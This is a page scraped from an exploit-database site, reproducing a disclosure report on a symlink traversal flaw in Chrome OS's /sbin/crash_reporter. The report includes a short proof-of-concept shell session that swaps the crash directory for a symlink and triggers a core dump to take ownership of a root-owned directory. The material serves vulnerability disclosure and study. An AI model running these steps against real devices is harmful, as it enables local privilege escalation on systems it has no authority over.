0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Chrome OS /sbin/crash_reporter Symlink Traversal Vulnerability
[Chrome OS: symlink traversal issue in /sbin/crash_reporter Tested on: Version 69.0.3473.0 (Official Build) dev (64-bit) CreateDirectoryWithSettings() in <a href="https://chromium.googlesource.com/chromiumos/platform2/+/master/crash-reporter/crash_collector.cc#107" title="" class="" rel="nofollow">https://chromium.googlesource.com/chromiumos/platform2/+/master/crash-reporter/crash_collector.cc#107</a> is executed by /sbin/crash_reporter every time a coredump is generated. This code improperly performs ownership changes inside a directory hierarchy controlled by the "chronos" user. This allows an attacker with code exec as "chronos" to trivially change the ownership of arbitrary directories (and also files if you win a race condition) to "chronos": chronos@localhost /home/user/<a href="https://crrev.com/98f63bfacd7086c303788fb107ff099ff85f3202" title="" class="" rel="nofollow">98f63bfacd7086c303788fb107ff099ff85f3202</a> $ rm -rf crash chronos@localhost /home/user/<a href="https://crrev.com/98f63bfacd7086c303788fb107ff099ff85f3202" title="" class="" rel="nofollow">98f63bfacd7086c303788fb107ff099ff85f3202</a> $ ln -s /mnt/stateful_partition crash chronos@localhost /home/user/<a href="https://crrev.com/98f63bfacd7086c303788fb107ff099ff85f3202" title="" class="" rel="nofollow">98f63bfacd7086c303788fb107ff099ff85f3202</a> $ ls -ld /mnt/stateful_partition drwxr-xr-x. 8 root root 4096 Jul 24 00:46 /mnt/stateful_partition chronos@localhost /home/user/<a href="https://crrev.com/98f63bfacd7086c303788fb107ff099ff85f3202" title="" class="" rel="nofollow">98f63bfacd7086c303788fb107ff099ff85f3202</a> $ bash -c 'kill -SIGILL $$' Illegal instruction (core dumped) chronos@localhost /home/user/<a href="https://crrev.com/98f63bfacd7086c303788fb107ff099ff85f3202" title="" class="" rel="nofollow">98f63bfacd7086c303788fb107ff099ff85f3202</a> $ ls -ld /mnt/stateful_partition drwxr-xr-x. 8 chronos chronos 4096 Jul 24 16:06 /mnt/stateful_partition This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public. # 0day.today [2024-10-06] #